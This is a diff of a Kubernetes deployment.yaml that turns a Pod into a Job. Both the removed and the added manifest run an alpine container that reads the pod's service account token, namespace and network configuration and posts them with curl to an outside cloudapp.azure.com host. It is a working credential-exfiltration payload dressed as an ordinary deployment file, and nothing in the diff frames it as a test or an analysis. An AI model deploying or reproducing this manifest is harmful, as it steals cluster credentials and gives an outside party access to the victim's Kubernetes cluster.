--- a/deployment.yaml
+++ b/deployment.yaml
@@ -1,20 +1,21 @@
-apiVersion: v1
-kind: Pod
+apiVersion: batch/v1
+kind: Job
 metadata:
-  name: potter-v6
+  name: potter-v3
 spec:
-  containers:
-    - name: shell
-      image: alpine
-      command:
-        - sh
-        - -c
-        - |
-          apk add --no-cache curl net-tools;
-          {
-            echo '>> NAMESPACE:' && cat /var/run/secrets/kubernetes.io/serviceaccount/namespace;
-            echo '>> TOKEN:' && cat /var/run/secrets/kubernetes.io/serviceaccount/token;
-            echo '>> IFCONFIG:' && ifconfig;
-            echo '>> CAN-I:' && echo 'kubectl not found, alpine não tem kubectl';
-          } | curl -X POST --data-binary @- http://potter-maga.brazilsouth.cloudapp.azure.com:8080
-  restartPolicy: Never
+  template:
+    spec:
+      restartPolicy: Never
+      containers:
+        - name: shell
+          image: alpine
+          command:
+            - sh
+            - -c
+            - |
+              apk add --no-cache curl net-tools;
+              {
+                echo '>> NAMESPACE:' && cat /var/run/secrets/kubernetes.io/serviceaccount/namespace;
+                echo '>> TOKEN:' && cat /var/run/secrets/kubernetes.io/serviceaccount/token;
+                echo '>> IFCONFIG:' && ifconfig;
+              } | curl -X POST --data-binary @- http://potter-maga.brazilsouth.cloudapp.azure.com:8080
